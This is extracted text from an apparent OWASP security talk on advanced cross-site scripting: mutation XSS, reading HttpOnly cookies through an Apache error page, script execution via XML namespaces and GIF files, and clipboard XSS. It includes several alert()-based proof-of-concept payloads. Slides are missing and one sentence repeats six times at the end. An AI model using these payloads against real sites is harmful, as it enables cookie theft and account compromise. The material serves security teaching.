3. • WE are Penetration Testing
• WE are Security Professionals
• WE are OWASP Lviv Chapter
• WE are Legio… oops
blog: http://owasp-lviv.blogspot.com
skype: y.bilyk
TEAM
4. AGENDA
- Power of XSS
- Read HttpOnly Cookies
- XSS via XML and GIF
- Clipboard XSS
- WAF XSS Bypass
5. Power of JavaScript
Modern WEB (Angular, jQuery)
Mobile APPS (PhoneGap)
Browser Performance (V8)
Server also use (Node.js)
11. • Two ways to modify DOM:
–DOM Direct Manipulation
–Using innerHTML
innerHtml
12. <script type ="text / javascript">
var new = "New <b> second </b> text";
function Change () {
document.all.myPar.innerHTML = new ;
}
</script >
<p id ="myPar"> First text </p >
<a href ="javascript : Change ()">
Change text above !
</a >
Example of innerHTML
13. Mutation XSS (Basics)
Web Browsers tolerates
wrong HTML syntax
It could cause very
interesting behavior
In some cases “safe” payload
could be transformed into
XSS injection
14. Example of HTML mutation
<s class ="">hello <b>goodbye</b>
<S>hello <B>goodbye</B></S>
Original Data
Mutated data by browser
15. Example of HTML mutation (JS)
<img src ="test.jpg" alt ="``onload=xss()"/>
<IMG alt =``onload=xss() src ="test.jpg">
Original Data
Mutated data by browser
16. Mutation XSS (Some Examples)
<p style="font-family:'223bx:expression(alert(1))/*'">
<P style="FONT-FAMILY: ; x: expression(alert(1))"></P>
Original Data
Mutated data by browser
17. Mutation XSS (Some Examples)
<article xmlns="x:img src=x onerror=alert(1)">
<article xmlns="x:img src=x onerror=alert(1)">
<img src=x onerror=alert(1) :article
xmlns="x:img src=x onerror=alert(1)">
</img src=x onerror=alert(1) :article>
Original Data
Mutated data by browser
21. HttpOnly XSS
Apache before 2.2.22 incorrectly
processes long cookies
Generated error page contains
ALL cookies from the request
We can cause such error and
read response HTML via XSS
25. • JS can be run only from HTML?
–NO
• XML can contain valid JS?
–YES
So just run JS from XML
XSS in XML?
26. • We can insert HTML tags as CDATA
–But this is JUST text in browser view
• We can insert valid XML element and
declare (X)HTML namespace for data
inside this tag
(X)HTML in XML
27. XML Namespace (Basics)
• XML Namespaces provide a method to avoid element
name conflicts (for ex. during joining 2 xml documents)
<table>
<tr>
<td>Apples</td>
<td>Bananas</td>
</tr>
</table>
<table>
<name>Coffee</name>
<width>80</width>
<length>120</length>
</table>
28. XML Namespace (Conflicts)
• Name conflicts in XML can easily be avoided using a
name prefix (h: and f:)
<h:table>
<h:tr>
<h:td>Apples</h:td>
<h:td>Bananas</h:td>
</h:tr>
</h:table>
<f:table>
<f:name>Coffee</f:name>
<f:width>80</f:width>
<f:length>120</f:length>
</f:table>
29. XSS in XML (Payload)
<x:script
xmlns:x=
"http://www.w3.org/1999/xhtml">
alert(‘XSS');
</x:script>
31. How it Works?
Browser’s first decision based
on the content type of document
XML allows us to define
namespace (for. ex. (X)HTML)
BINGO! Browser executes part
of XML as (X)HTML (like SVG)
37. How it Works?
JavaScript Interpreter works only
with ASCII symbols
We need to modify some
non-printable symbols in the img.
header (to create valid JS syntax)
Inject JavaScript code into image
39. Clipboard (Basics)
Clipboard operations are not
simple memory copy operations
Data loaded from the clipboard
depends on destination (Notepad)
Data stored in the clipboard
depends on the source (MS Word)
40. Clipboard XSS (How?)
Edit font style in the document
(DOC, ODT, PDF, etc.)
Type/Create some text with new
font style in this document
Copy this text and paste into
text area on the victim site
An HTML element’s innerHTML property deals with creating HTML content from arbitrarily formatted strings on write access on the one hand, and with serializing HTML DOM nodes into strings on read access on the other
An HTML element’s innerHTML property deals with creating HTML content from arbitrarily formatted strings on write access on the one hand, and with serializing HTML DOM nodes into strings on read access on the other
An HTML element’s innerHTML property deals with creating HTML content from arbitrarily formatted strings on write access on the one hand, and with serializing HTML DOM nodes into strings on read access on the other
An HTML element’s innerHTML property deals with creating HTML content from arbitrarily formatted strings on write access on the one hand, and with serializing HTML DOM nodes into strings on read access on the other
An HTML element’s innerHTML property deals with creating HTML content from arbitrarily formatted strings on write access on the one hand, and with serializing HTML DOM nodes into strings on read access on the other
An HTML element’s innerHTML property deals with creating HTML content from arbitrarily formatted strings on write access on the one hand, and with serializing HTML DOM nodes into strings on read access on the other